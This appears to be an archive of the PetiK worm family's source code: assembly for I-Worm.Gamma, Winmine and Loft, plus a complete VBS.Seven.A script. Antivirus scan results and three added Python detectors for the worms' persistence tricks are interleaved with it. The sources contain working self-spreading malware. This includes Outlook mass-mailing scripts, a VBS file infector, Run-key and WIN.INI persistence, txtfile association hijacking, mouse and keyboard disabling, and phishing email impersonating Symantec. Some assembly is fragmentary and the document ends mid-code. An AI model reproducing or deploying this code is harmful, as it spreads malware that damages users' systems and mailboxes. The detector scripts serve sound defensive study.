The worm waits for an active Internet connection and tries to establish one by connecting
to www.symantec.com. When the connection is successful, it scans all *.*htm* files in
"Temporary Internet Files" to find email addresses. For each address it finds, it sends a
copy of itself to that address :
With Regards,
Symantec Corporation (http://www.symantec.com)
Attachment : SETUP.EXE
#
.586p
.model flat,stdcall
include useful.inc
extrn CloseHandle:PROC
extrn CopyFileA:PROC
extrn CreateDirectoryA:PROC
extrn CreateFileA:PROC
extrn CreateFileMappingA:PROC
extrn DeleteFileA:PROC
extrn ExitProcess:PROC
extrn FindClose:PROC
extrn FindFirstFileA:PROC
extrn FindNextFileA:PROC
extrn gethostbyname:PROC
extrn GetFileSize:PROC
extrn GetModuleFileNameA:PROC
extrn GetModuleHandleA:PROC
extrn GetSystemDirectoryA:PROC
extrn GetSystemTime:PROC
extrn GetWindowsDirectoryA:PROC
extrn lstrcat:PROC
extrn lstrcmp:PROC
extrn MAPILogoff:PROC
extrn MAPILogon:PROC
extrn MAPISendMail:PROC
extrn MapViewOfFile:PROC
extrn MessageBoxA:PROC
extrn RegCloseKey:PROC
extrn RegOpenKeyExA:PROC
extrn RegQueryValueExA:PROC
extrn SetCurrentDirectoryA:PROC
extrn Sleep:PROC
extrn SwapMouseButton:PROC
extrn UnmapViewOfFile:PROC
extrn WinExec:PROC
extrn WriteFile:PROC
extrn WritePrivateProfileStringA:PROC
.data
szComName db 50 dup (0)
szOrig db 50 dup (0)
szWinini db 50 dup (0)
szTif db 7Fh dup (0)
FileHandle dd ?
RegHandle dd ?
SrchHandle dd ?
octets dd ?
ValueType dd 0
mail_address db 128 dup (?)
MAPISession dd 0
DIR db "C:\Data",00h
information db "C:\Data\info.vbs",00h
infoexec db "wscript C:\Data\info.vbs",00h
mirc db "C:\gamma",00h
script1 db "C:\mirc\script.ini",00h
script2 db "C:\mirc32\script.ini",00h
script3 db "C:\progra~1\mirc\script.ini",00h
script4 db "C:\progra~1\mirc32\script.ini",00h
Copie db "\SETUP.EXE",00h
Winini db "\\WIN.INI",00h
run db "run",00h
windows db "windows",00h
TEXTE db "This file does not appear to be a Win32 valid file. ",00h
TITRE2 db "I-Worm.Gamma (c)2001",00h
TEXTE2 db "PetiK greets you",00h
symantec db "www.symantec.com",00h
tempnetfile db "\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders",00h
Value db "Cache",00h
FICHIER db "*.*htm*",00h
CREATE_NEW equ 00000001h
CREATE_ALWAYS equ 00000002h
FILE_ATTRIBUTE_READONLY equ 00000001h
FILE_ATTRIBUTE_NORMAL equ 00000080h
FILE_MAP_READ equ 00000004h
FILE_SHARE_READ equ 00000001h
GENERIC_READ equ 80000000h
GENERIC_WRITE equ 40000000h
HKEY_USERS equ 80000003h
KEY_QUERY_VALUE equ 00000001h
KEY_SET_VALUE equ 00000002h
MAX_PATH equ 260
OPEN_EXISTING equ 00000003h
PAGE_READONLY equ 00000002h
REG_SZ equ 00000001h
SYSTIME struct
wYear WORD ?
wMonth WORD ?
wDayOfWeek WORD ?
wDay WORD ?
wHour WORD ?
wMinute WORD ?
wSecond WORD ?
wMillisecond WORD ?
SYSTIME ends
SystemTime SYSTIME <>
time struc
LowDateTime dd ?
HighDateTime dd ?
time ends
win32 struc
FileAttributes dd ?
CreationTime time ?
LastAccessTime time ?
LastWriteTime time ?
FileSizeHifh dd ?
FileSizeLow dd ?
Reserved0 dd ?
Reserved1 dd ?
FileName dd MAX_PATH (?)
AlternativeFileName db 13 dup (?)
db 3 dup (?)
win32 ends
CHERCHE win32 <>
mircd: db "[script]",0dh,0ah
db ";Don't delete this file",0dh,0ah
db "n0=ON 1:JOIN:#:{",0dh,0ah
db "n1= /if ( $nick == $me ) { halt }",0dh,0ah
db "n2= /.dcc send $nick "
szCopie db 50 dup (0)
db "",0dh,0ah
db "n3=}",0dh,0ah
MIRCTAILLE equ $-mircd
Email dd ?
dd offset Subject
dd offset Message
dd ?
dd offset DateS
dd ?
dd 2
dd offset MelFrom
dd 1
dd offset MelTo
dd 1
dd offset Attach
MelFrom dd ?
dd ?
dd offset MelFrom
dd offset sAddr
dd ?
dd ?
MelTo dd ?
dd 1
dd offset MelTo
dd offset mail_address
dd ?
dd ?
Attach dd ?
dd ?
dd ?
dd offset szOrig
dd ?
dd ?
Subject db "Virus/Worms Fix from Symantec Corporation (Norton Antivirus)",00h
Message db "Hi,",0dh,0ah,0dh,0ah
db "Symantec Corporation send you the last version of our tool Virus/Worms Fix. "
db "Here is the version 3.1 .",0dh,0ah
db "This tool detect, repair and protect users against Bloodhound.IRC.Worm, "
db "Bloodhound.VBS.Worm, Bloodhound.W32 and Bloodhound.WordMacro .",0dh,0ah,0dh,0ah
db 09h,09h,"With Regards,",0dh,0ah
db 09h,09h,"Symantec Corporation (http://www.symantec.com)",00h
DateS db "06/06/2001",00h
sAddr db "snd@symantec.com",00h
.code
DEBUT:
VERIF: push 00h
call GetModuleHandleA
push 50
push offset szOrig
push eax
call GetModuleFileNameA
push 50h
push offset szCopie
call GetSystemDirectoryA
push offset Copie
push offset szCopie
call lstrcat
WININI: push 50
push offset szWinini
call GetWindowsDirectoryA
push offset Winini
push offset szWinini
call lstrcat
push offset szWinini
push offset szCopie
push offset run
push offset windows
call WritePrivateProfileStringA
MESSAGE:push 1010h
push offset szOrig
push offset TEXTE
push 00h
call MessageBoxA
jmp FIN
push [RegHandle]
call RegCloseKey
END_S: popad
HTML: pushad
push 00h
push FILE_ATTRIBUTE_NORMAL
push OPEN_EXISTING
push 00h
push FILE_SHARE_READ
push GENERIC_READ
push offset CHERCHE.FileName
call CreateFileA
inc eax
je END_S
dec eax
xchg eax,ebx
xor eax,eax
push eax
push eax
push eax
push PAGE_READONLY
push eax
push ebx
call CreateFileMappingA
test eax,eax
jz FERME1
xor eax,eax
push eax
push eax
push eax
push FILE_MAP_READ
push ebp
call MapViewOfFile
test eax,eax
jz FERME2
xchg eax,esi
push 00h
push ebx
call GetFileSize
xchg eax,ecx
jecxz FERME3
jmp ls_s_m
end DEBUT
File Gamma.exe received on 05.16.2009 11:58:18 (CET)
Antivirus Version Last Update Result
a-squared 4.0.0.101 2009.05.16 Email-Worm.Win32.Petik!IK
AhnLab-V3 5.0.0.2 2009.05.15 Win32/PetTick.8704
AntiVir 7.9.0.168 2009.05.15 Worm/Petik.AV.09
Antiy-AVL 2.0.3.1 2009.05.15 Worm/Win32.Win32
Authentium 5.1.2.4 2009.05.15 W32/Malware!d62f
Avast 4.8.1335.0 2009.05.15 Win32:Gamma
AVG 8.5.0.336 2009.05.15 I-Worm/Petik
BitDefender 7.2 2009.05.16 Win32.Petik.C@mm
CAT-QuickHeal 10.00 2009.05.15 -
ClamAV 0.94.1 2009.05.15 Worm.Petik.AV.09
Comodo 1157 2009.05.08 Worm.Win32.Petik.C
DrWeb 5.0.0.12182 2009.05.16 Win32.Petik.8704
eSafe 7.0.17.0 2009.05.14 -
eTrust-Vet 31.6.6508 2009.05.16 Win32/Mania
F-Prot 4.4.4.56 2009.05.15 W32/Malware!d62f
F-Secure 8.0.14470.0 2009.05.15 Email-Worm.Win32.Petik
Fortinet 3.117.0.0 2009.05.16 W32/PetTick.D@mm
GData 19 2009.05.16 Win32.Petik.C@mm
Ikarus T3.1.1.49.0 2009.05.16 Email-Worm.Win32.Petik
K7AntiVirus 7.10.735 2009.05.14 Email-Worm.Win32.Petik
Kaspersky 7.0.0.125 2009.05.16 Email-Worm.Win32.Petik
McAfee 5616 2009.05.15 W32/PetTick@MM
McAfee+Artemis 5616 2009.05.15 W32/PetTick@MM
McAfee-GW-Edition 6.7.6 2009.05.15 Worm.Petik.AV.09
Microsoft 1.4602 2009.05.16 Worm:Win32/Petik.C@mm
NOD32 4080 2009.05.15 Win32/Petik.C
Norman 6.01.05 2009.05.16 W32/Pet_Tick.8704.A
nProtect 2009.1.8.0 2009.05.16 -
Panda 10.0.0.14 2009.05.16 DDoS/Petik.C
PCTools 4.4.2.0 2009.05.15 I-Worm.Gamma.A
Prevx 3.0 2009.05.16 -
Rising 21.29.52.00 2009.05.16 Worm.Mail.Petik.g
Sophos 4.41.0 2009.05.16 W32/Gamma
Sunbelt 3.2.1858.2 2009.05.16 BehavesLike.Win32.Malware (v)
Symantec 1.4.4.12 2009.05.16 W95.Pet_Tick.gen
TheHacker 6.3.4.1.326 2009.05.15 W32/PetTick@MM
TrendMicro 8.950.0.1092 2009.05.15 WORM_PET.TICK.D
VBA32 3.12.10.5 2009.05.16 OScope.Dialer.GMHA
ViRobot 2009.5.15.1737 2009.05.15 I-Worm.Win32.PetTick.8704.A
VirusBuster 4.6.5.0 2009.05.15 I-Worm.Gamma.A
Additional information
File size: 8704 bytes
MD5...: 997ae169da2f57e7e48e6862eb70223a
SHA1..: b7349d6e5c65551d1162597cf4871b0c8e04e6b1
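Mustard, Embargo, Maya and Gamma above all drop a mIRC script.ini whose JOIN handler DCC-sends a file to every nick that enters a channel. The following Python scanner is an added example (not part of the archive) that parses the [script] section layout those files use (n0=, n1=, ... lines) and reports any handler that runs "/dcc send $nick <file>", so a user or admin can review a script.ini before mIRC loads it. Both sample scripts are constructed for the example.

```python
"""Flag mIRC script.ini handlers that DCC-send a file to every nick that joins.

Added defender-side example, not from the archive. The scanner understands
the [script] section layout (n0=, n1=, ... lines) and reports any event
handler that runs "/dcc send $nick <file>".
"""
import re

# Constructed samples: a harmless greeter and the dropper pattern seen above.
BENIGN_SCRIPT = """\
[script]
n0=on 1:TEXT:hello*:#:{
n1= /msg $chan Hi $nick
n2=}
"""

SUSPECT_SCRIPT = """\
[script]
;Don't delete this file
n0=ON 1:JOIN:#:{
n1= /if ( $nick == $me ) { halt }
n2= /.dcc send $nick C:\\Windows\\Maya.doc
n3=}
"""

# "on <level>:<EVENT>:..." opens a handler; "/dcc send $nick <path>" pushes a file.
EVENT_RE = re.compile(r"^\s*/?on\s+[^:\s]+:(?P<event>[A-Za-z]+):", re.IGNORECASE)
DCC_RE = re.compile(r"/\.?dcc\s+send\s+\$nick\s+(?P<path>\S+)", re.IGNORECASE)
NUMBERED_RE = re.compile(r"^n(\d+)=(.*)$")


def script_lines(text):
    """Return the bodies of the n<N>= lines of the [script] section, in numeric order."""
    in_script, numbered = False, []
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            in_script = line.lower() == "[script]"
            continue
        if not in_script or line.startswith(";"):
            continue  # outside [script], or a comment line
        m = NUMBERED_RE.match(line)
        if m:
            numbered.append((int(m.group(1)), m.group(2)))
    return [body for _, body in sorted(numbered)]


def find_auto_dcc(text):
    """Return (EVENT, path) for each handler that DCC-sends a file to the triggering nick."""
    findings, current_event = [], None
    for body in script_lines(text):
        ev = EVENT_RE.match(body)
        if ev:
            current_event = ev.group("event").upper()
        dcc = DCC_RE.search(body)
        if dcc and current_event is not None:
            findings.append((current_event, dcc.group("path")))
        if body.strip() == "}":  # handler block closed
            current_event = None
    return findings


def is_auto_dcc_on_join(text):
    """True when a JOIN handler pushes a file: the self-spreading pattern used above."""
    return any(event == "JOIN" for event, _ in find_auto_dcc(text))


if __name__ == "__main__":
    for name, script in (("benign", BENIGN_SCRIPT), ("suspect", SUSPECT_SCRIPT)):
        print(name, find_auto_dcc(script))
```

The check keys on the event type rather than on a file name because the dropped file differs from worm to worm (Maya.doc, SETUP.EXE, WinHelp.htm) while the "send to whoever joins" handler is the constant.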
comment #
Name : I-Worm.Winmine
Author : PetiK
Date : June 12th - June 15th
Size : 6656 bytes
Action : Checks whether the file is run from the SYSTEM folder. If so, it creates a file
named "C:\ENVOIE_VBS.vbs" to spread with Outlook :
Subject : Is the work so hard ??
Body : Relax you with the last version of <Winmine>.
Attached : WINMINE.EXE
It changes the start page of Internet Explorer to
"http://perso.libertysurf.fr/dacruz/mayaindex.html"
If the current day is the 15th, it displays a message and swaps the buttons of the mouse.
After five minutes, the worm shuts down the computer.
Otherwise, it copies itself to the SYSTEM folder, alters the load= line in the WIN.INI
file so that the copy runs when the computer starts, and displays a message box.
#
.586p
.model flat
.code
callx macro a
extrn a:proc
call a
endm
DEBUT:
VERIF: push 00h
callx GetModuleHandleA
push 50
push offset szOrig
push eax
callx GetModuleFileNameA
push 50h
push offset szCopie
callx GetSystemDirectoryA
push offset Copie
push offset szCopie
callx lstrcat
WININI: push 50
push offset szWinini
callx GetWindowsDirectoryA
push offset Winini
push offset szWinini
callx lstrcat
push offset szWinini
push offset szCopie
push offset load
push offset windows
callx WritePrivateProfileStringA
MESSAGE:push 1040h
push offset TITRE
push offset TEXTE
push 00h
callx MessageBoxA
jmp FIN
SEND: push 00h
push FILE_ATTRIBUTE_READONLY
push CREATE_NEW
push 00h
push FILE_SHARE_READ
push GENERIC_WRITE
push offset vbssend
callx CreateFileA
cmp eax,-1
je GO
mov [FileHandle],eax
push 00h
push offset octets
push VBSTAILLE
push offset vbsd
push [FileHandle]
callx WriteFile
push [FileHandle]
callx CloseHandle
GO: push 01h
push offset onyva
callx WinExec
.data
szCopie db 50 dup (0)
szOrig db 50 dup (0)
szWinini db 50 dup (0)
FileHandle dd ?
octets dd ?
hdll dd ?
setvalue dd ?
Copie db "\WINMINE.EXE",00h
vbssend db "C:\ENVOIE_VBS.vbs",00h
onyva db "wscript C:\ENVOIE_VBS.vbs",00h
Winini db "\\WIN.INI",00h
load db "load",00h
windows db "windows",00h
TITRE db "Winmine - Microsoft Corporation (R)",00h
TEXTE db "The last update of the game ""Winmine"" written by Microsoft
Corporation",00h
TITRE2 db "I-Worm.Winmine",00h
TEXTE2 db "By PetiK (c)2001",00h
main_s db "Software\Microsoft\Internet Explorer\Main",00h
start_key db "Start Page",00h
start_page db "http://perso.libertysurf.fr/dacruz/mayaindex.html",00h
dllName db "SHLWAPI.dll",00h
FunctionName db "SHSetValueA",00h
wormname db "I-Worm.Winmine by PetiK",00h
vbsd:
db 'On Error Resume Next',0dh,0ah
db 'Set A=CreateObject("Outlook.Application")',0dh,0ah
db 'Set B=A.GetNameSpace("MAPI")',0dh,0ah
db 'For Each C In B.AddressLists',0dh,0ah
db 'If C.AddressEntries.Count <> 0 Then',0dh,0ah
db 'For D=1 To C.AddressEntries.count',0dh,0ah
db 'Set E=C.AddressEntries(D)',0dh,0ah
db 'Set F=A.CreateItem(0)',0dh,0ah
db 'F.To=E.Address',0dh,0ah
db 'F.Subject="Is the work so hard ??"',0dh,0ah
db 'F.Body="Relax you with the last version of <Winmine>."',0dh,0ah
db 'Set G=CreateObject("Scripting.FileSystemObject")',0dh,0ah
db 'F.Attachments.Add G.BuildPath(G.GetSpecialFolder(1),"Winmine.exe")',0dh,0ah
db 'F.DeleteAfterSubmit=True',0dh,0ah
db 'If F.To <> "" Then',0dh,0ah
db 'F.Send',0dh,0ah
db 'End If',0dh,0ah
db 'Next',0dh,0ah
db 'End If',0dh,0ah
db 'Next',00h
VBSTAILLE equ $-vbsd
SYSTIME struct
wYear WORD ?
wMonth WORD ?
wDayOfWeek WORD ?
wDay WORD ?
wHour WORD ?
wMinute WORD ?
wSecond WORD ?
wMillisecond WORD ?
SYSTIME ends
SystemTime SYSTIME <>
end DEBUT
end
File Winmine.exe received on 05.10.2009 23:52:01 (CET)
Additional information
File size: 6656 bytes
MD5...: 23f6db768eacfa01a352a657acb26c9b
SHA1..: bc83ebddddead5521afeefd9e9df47e342f05153
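Mustard, Gamma and Winmine above all persist by rewriting the run= or load= line of the [windows] section of WIN.INI so that a copy placed in the Windows or System folder starts with the machine. The following Python script is an added example (not part of the archive) that parses a WIN.INI-style file, lists every program named on those two entries and explains why each deserves review; the sample INI text and the "C:\WINDOWS\" prefix it checks against are constructed assumptions.

```python
"""Audit the [windows] section of a WIN.INI-style file for run=/load= persistence.

Added defender-side example, not part of the archive. Legacy run= and load=
entries are plain, unquoted, comma- or space-separated program lists, and on
a healthy system they are normally empty. The sample INI text is constructed.
"""
import re
import ntpath

SAMPLE_WIN_INI = """\
; constructed sample of an altered WIN.INI
[windows]
load=
run=C:\\WINDOWS\\SYSTEM\\SETUP.EXE
NullPort=None
device=HP LaserJet,HPPCL5MS,LPT1:

[Desktop]
Wallpaper=(None)
"""

CLEAN_WIN_INI = """\
[windows]
load=
run=
"""

SPLIT_RE = re.compile(r"[,\s]+")
# Assumed install root; adjust to the audited machine's Windows folder.
WINDOWS_DIRS = ("c:\\windows\\",)


def parse_ini(text):
    """Return {section: {key: value}} with section and key names lowercased."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in ";#":
            continue  # blank or comment
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, {})
            continue
        if current is None or "=" not in line:
            continue
        key, _, value = line.partition("=")
        sections[current][key.strip().lower()] = value.strip()
    return sections


def startup_programs(ini_text):
    """Return (entry, program) for every program named on run= or load=."""
    windows = parse_ini(ini_text).get("windows", {})
    programs = []
    for entry in ("run", "load"):
        for prog in SPLIT_RE.split(windows.get(entry, "")):
            if prog:
                programs.append((entry, prog))
    return programs


def audit_win_ini(ini_text):
    """Describe each autostart program and why a reviewer should look at it."""
    findings = []
    for entry, prog in startup_programs(ini_text):
        reasons = [f"{entry}= is a legacy autostart hook that is normally empty"]
        if prog.lower().startswith(WINDOWS_DIRS):
            reasons.append("program lives in the Windows folder tree, where the worms above drop copies")
        findings.append({"entry": entry, "program": prog,
                         "basename": ntpath.basename(prog), "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in audit_win_ini(SAMPLE_WIN_INI):
        print(f["entry"], f["program"], "->", "; ".join(f["reasons"]))
```

Because the legacy format cannot quote paths, a program under "C:\Program Files\" would be split into two tokens; that is a property of the hook itself, not of the parser, and is one more reason any non-empty run=/load= line should be looked at by hand.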
' Name : VBS.Seven.A
' Author : PetiK
' Date : June 16th 2001
' Size : 3626 byte
' Action : It copies itself to \WINDOWS\Seven.vbs, \WINDOWS\SYSTEM\Envy.vbs
' and \WINDOWS\TEMP\Lust.vbs. It adds values to the Run key (Envy) and to the
' RunServices key (Lust). When the current day is the 1st, 15th or 30th it adds a
' value to the Run key of HKCU (Anger=rundll32 mouse,disable), which disables
' the mouse at each start. When the current day is the 12th or 28th it displays a
' message box and closes Windows when the user clicks on "OK".
' When the day is the 14th it displays another message box; when the user
' clicks on "OK", the worm disables the keyboard.
' When the day is the 5th or 17th, it changes some values in the registry: when the
' user opens a TXT file, "\WINDOWS\Seven.vbs" starts, and the VBS icon is
' replaced by the TXT icon.
' It then infects all VBS files that it finds on the disk, appending code
' at the end of each file to run \WINDOWS\Seven.vbs when that file is run.
' The worm uses Outlook to spread too :
' Subject : What is the seven sins ??
' Body : Look at this file and learn them.
' Attached : Seven.vbs
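The Seven header above describes autostart values under Run and RunServices, a Run value that disables the mouse, and a txtfile open-command redirect to wscript; earlier, Kodak lowers the Word macro security level under HKCU\Software\Microsoft\Office\9.0 and 10.0\Word\Security, and Embargo points the Internet Explorer start page at a local HTML file. The following Python script is an added example (not part of the archive) that reads a registry export in the "Windows Registry Editor" text format and flags each of those settings; the export is constructed for the example and the value data in it are placeholders.

```python
"""Audit a registry export (.reg text) for the persistence and hijack patterns above.

Added defender-side example, not part of the archive. Flags: autostart values
that launch a script host or disable input devices, a txtfile open command
redirected to a script host, Word macro security set to Low (Level = 1) and an
Internet Explorer start page that is not an http(s) URL. Sample is constructed.
"""
import re

REG_SAMPLE = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"Anger"="rundll32 mouse,disable"

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices]
"Lust"="C:\\WINDOWS\\TEMP\\Lust.vbs"

[HKEY_CLASSES_ROOT\txtfile\shell\open\command]
@="wscript C:\\WINDOWS\\Seven.vbs"
"Pride"="C:\\WINDOWS\\NOTEPAD.EXE %1"

[HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security]
"Level"=dword:00000001

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Start Page"="C:\\WINDOWS\\WinHelp.htm"
'''

# "name"=data or @=data (the key's default value).
VALUE_RE = re.compile(r'^(?:@|"(?P<name>(?:[^"\\]|\\.)*)")=(?P<data>.*)$')
AUTOSTART_SUFFIXES = (r"\currentversion\run", r"\currentversion\runservices")
SCRIPT_EXT = (".vbs", ".vbe", ".js", ".jse", ".wsf")
WORD_SECURITY_RE = re.compile(r"\\office\\(9|10)\.0\\word\\security$")


def parse_reg(text):
    """Return {key: {name: data}}; default value under "", dword as int, strings unescaped."""
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("Windows Registry Editor"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys.setdefault(current, {})
            continue
        m = VALUE_RE.match(line)
        if not m or current is None:
            continue
        name, data = m.group("name") or "", m.group("data")
        if data.lower().startswith("dword:"):
            keys[current][name] = int(data[6:], 16)
        elif len(data) >= 2 and data[0] == data[-1] == '"':
            keys[current][name] = re.sub(r"\\(.)", r"\1", data[1:-1])  # undo \\ and \"
        else:
            keys[current][name] = data  # hex(...) and other types kept verbatim
    return keys


def _launches_script(command):
    c = command.lower()
    return c.endswith(SCRIPT_EXT) or "wscript" in c or "cscript" in c


def audit_registry(text):
    """Return (kind, key, value_name, data) tuples for each suspicious setting."""
    findings = []
    for key, values in parse_reg(text).items():
        k = key.lower()
        if k.endswith(AUTOSTART_SUFFIXES):
            for name, data in values.items():
                if not isinstance(data, str):
                    continue
                d = data.lower()
                if _launches_script(d):
                    findings.append(("autostart-script", key, name, data))
                elif "rundll32" in d and ("mouse" in d or "keyboard" in d):
                    findings.append(("autostart-input-disable", key, name, data))
        if k.endswith(r"\shell\open\command") and _launches_script(str(values.get("", ""))):
            findings.append(("file-association-hijack", key, "", values.get("")))
        if WORD_SECURITY_RE.search(k) and values.get("Level") == 1:
            findings.append(("word-macro-security-low", key, "Level", 1))
        if k.endswith(r"\internet explorer\main"):
            page = values.get("Start Page")
            if isinstance(page, str) and not page.lower().startswith(("http://", "https://")):
                findings.append(("ie-start-page-local", key, "Start Page", page))
    return findings


if __name__ == "__main__":
    for kind, key, name, data in audit_registry(REG_SAMPLE):
        print(f"{kind:28} {key}\\{name or '(Default)'} = {data!r}")
```

The parser keeps hex(...) data verbatim instead of dropping it so that unusual value types stay visible in a review; the same checks apply unchanged to an export produced with "reg export" on a live machine.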
'VBS.Seven.A
On Error Resume Next
Set fso=CreateObject("Scripting.FileSystemObject")
Set ws=CreateObject("WScript.Shell")
Set win=fso.GetSpecialFolder(0)
Set sys=fso.GetSpecialFolder(1)
Set tmp=fso.GetSpecialFolder(2)
SEVEN()
Sub SEVEN()
Set org=fso.GetFile(WScript.ScriptFullname)
org.Copy(win&"\Seven.vbs")
org.Copy(sys&"\Envy.vbs")
org.Copy(tmp&"\Lust.vbs")
run=("HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Envy")
runs=("HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices\Lust")
ws.RegWrite run,sys&"\Envy.vbs"
ws.RegWrite runs,tmp&"\Lust.vbs"
First()
Second()
Third()
Disk()
Send()
End Sub
Sub First()
If Day(Now)=1 or Day(Now)=15 or Day(Now)=30 Then
run2=("HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Anger")
ws.RegWrite run2,"rundll32 mouse,disable"
End If
End Sub
Sub Second()
If Day(Now)=12 or Day(Now)=28 Then
MsgBox "You're tired now"+VbCrLf+"Switch off you're Computer",vbExclamation,"Seven"
ws.Run "rundll32.exe user.exe,exitwindows"
End If
If Day(Now)=14 Then
MsgBox "The keyboard is on strike !",vbInformation,"Seven"
ws.Run "rundll32 keyboard,disable"
End If
End Sub
Sub Third()
If Day(Now)=5 or Day(Now)=17 Then
bur=ws.RegRead("HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Desktop")
if not fso.FileExists(win&"\COPYRIGHT.txt.vbs") Then
txt=ws.RegRead("HKCR\txtfile\shell\open\command\")
ws.RegWrite "HKCR\txtfile\shell\open\command\Pride",txt
ws.RegWrite "HKCR\txtfile\shell\open\command\","wscript "&win&"\Seven.vbs"
icot=ws.RegRead("HKCR\txtfile\DefaultIcon\")
icov=ws.RegRead("HKCR\VBSfile\DefaultIcon\")
ws.RegWrite "HKCR\VBSfile\DefaultIcon\oldicon",icov
ws.RegWrite "HKCR\VBSfile\DefaultIcon\",icot
Set copy=fso.CreateTextFile (bur&"\COPYRIGHT.txt.vbs")
copy.WriteLine "MsgBox ""You're infected by my new Worm""+VbCrLf+VbCrLf+"" By PetiK (c)2001"",vbcritical,""VBS.Seven.A"""
copy.Close
Set copy=fso.CreateTextFile (win&"\COPYRIGHT.txt.vbs")
copy.WriteLine "MsgBox ""You're infected by my new Worm""+VbCrLf+VbCrLf+"" By PetiK (c)2001"",vbcritical,""VBS.Seven.A"""
copy.Close
end if
End If
End Sub
Sub Disk
Set dr=fso.Drives
For Each d in dr
If d.DriveType=2 or d.DriveType=3 Then
list(d.path&"\")
end If
Next
End Sub
Sub infect(dossier)
Set f=fso.GetFolder(dossier)
Set fc=f.Files
For each f1 in fc
ext=fso.GetExtensionName(f1.path)
ext=lcase(ext)
If (ext="vbs") Then
Set cot=fso.OpenTextFile(f1.path, 1, False)
If cot.ReadLine <> "'VBS.Seven.A" then
cot.Close
Set cot=fso.OpenTextFile(f1.path, 1, False)
vbsorg=cot.ReadAll()
cot.Close
Set inf=fso.OpenTextFile(f1.path,2,True)
inf.WriteLine "'VBS.Seven.A"
inf.Write(vbsorg)
inf.WriteLine ""
inf.WriteLine "Set w=CreateObject(""WScript.Shell"")"
inf.WriteLine "Set f=CreateObject(""Scripting.FileSystemObject"")"
inf.WriteLine "w.run f.GetSpecialFolder(0)&""\Seven.vbs"""
inf.Close
End If
End If
Next
End Sub
Sub list(dossier)
Set f=fso.GetFolder(dossier)
Set sf=f.SubFolders
For each f1 in sf
infect(f1.path)
list(f1.path)
Next
End Sub
Sub Send()
Set A=CreateObject("Outlook.Application")
Set B=A.GetNameSpace("MAPI")
For Each C In B.AddressLists
If C.AddressEntries.Count <> 0 Then
For D=1 To C.AddressEntries.count
Set E=C.AddressEntries(D)
Set F=A.CreateItem(0)
F.To=E.Address
F.Subject="What is the seven sins ??"
F.Body="Look at this file and learn them."
Set G=CreateObject("Scripting.FileSystemObject")
F.Attachments.Add G.BuildPath(G.GetSpecialFolder(0),"Seven.vbs")
F.DeleteAfterSubmit=True
If F.To <> "" Then
F.Send
End If
Next
End If
Next
End Sub
File Seven.vbs received on 05.16.2009 19:29:21 (CET)
Additional information
File size: 3626 bytes
MD5...: 8781b9a791c0c144e97a466486f6ef33
SHA1..: 6872bc5747eb4701e579305c68c517e712f680ec
comment #
Name : I-Worm.Loft
Author : PetiK
Date : June 16th - June 22nd
Size : 8704 byte
Action : If the file is not \WINDOWS\SYSTEM\LOFT.EXE, it copies itself to this file and alters
the run= line in the WIN.INI file to run at each start. It copies itself to
\WINDOWS\LOFT_STORY.EXE too.
Otherwise, it checks whether the key HKCU\Software\Microsoft\PetiK exists. If it does not, the
worm creates the file "Loft.htm" in the StartUp folder. When the user accepts the
ActiveX of this page, it modifies the start page of Internet Explorer to download the
file ActiveX.vbs.
This file sends various information about the computer to three addresses :
loftptk@multimania(castaldi), petik@multimania.com(vlad14) and euphoria@ctw.net(pk29a).
It displays a message every 28th of the month and modifies the start page of Internet
Explorer as well as RegisteredOwner and RegisteredOrganization. It checks whether an internet
connection exists. If not, it retries in a loop every five seconds, otherwise it displays a message.
It scans all *.htm* files in the "Temporary Internet Files" folder to find email addresses.
#
.586p
.model flat
.code
callx macro a
extrn a:proc
call a
endm
include useful.inc
DEBUT:
VERIF: push 00h
callx GetModuleHandleA
push 50
push offset szOrig
push eax
callx GetModuleFileNameA
push 50h
push offset szCopie
callx GetSystemDirectoryA
@pushsz "\LOFT.EXE"
push offset szCopie
callx lstrcat
push 50h
push offset szCopieb
callx GetWindowsDirectoryA
@pushsz "\LOFT_STORY.EXE"
push offset szCopieb
callx lstrcat
WININI: push 50
push offset szWinini
callx GetWindowsDirectoryA
@pushsz "\\WIN.INI"
push offset szWinini
callx lstrcat
push offset szWinini
push offset szCopie
@pushsz "run"
@pushsz "windows"
callx WritePrivateProfileStringA
MESSAGE:push 1040h
@pushsz "Loft Story"
@pushsz "I'm fucking the Loft Story"
push 00h
callx MessageBoxA
jmp FIN
push [RegHandle]
callx RegCloseKey
push [RegHandle]
callx RegCloseKey
parse_html:
pushad
push 00h
push FILE_ATTRIBUTE_NORMAL
push OPEN_EXISTING
push 00h
push FILE_SHARE_READ
push GENERIC_READ
push offset HTM.FileName
callx CreateFileA ;open the file
inc eax
je FIN
dec eax
xchg eax,ebx
xor eax,eax
push eax
push eax
push eax
push PAGE_READONLY
push eax
push ebx
callx CreateFileMappingA ;create the file mapping
test eax,eax
je ph_close
xchg eax,ebp
xor eax,eax
push eax
push eax
push eax
push FILE_MAP_READ
push ebp
callx MapViewOfFile ;map the file
test eax,eax
je ph_close2
xchg eax,esi
push 00h
push ebx
callx GetFileSize ;get its size
xchg eax,ecx
jecxz ph_close3
ls_scan_mail:
call @mt
db 'mailto:'
@mt: pop edi
l_scan_mail:
pushad
push 7
pop ecx
rep
cmpsb ;search for "mailto:"
popad ;string
je scan_mail ;check the mail address
inc esi
loop l_scan_mail ;in a loop
ph_close3:
push esi
callx UnmapViewOfFile ;unmap view of file
ph_close2:
push ebp
callx CloseHandle ;close file mapping
ph_close:
push ebx
callx CloseHandle ;close the file
popad
ret
scan_mail:
xor edx,edx
add esi,7
mov edi,offset mail_address ;where to store the
push edi ;mail address
n_char: lodsb
cmp al,' '
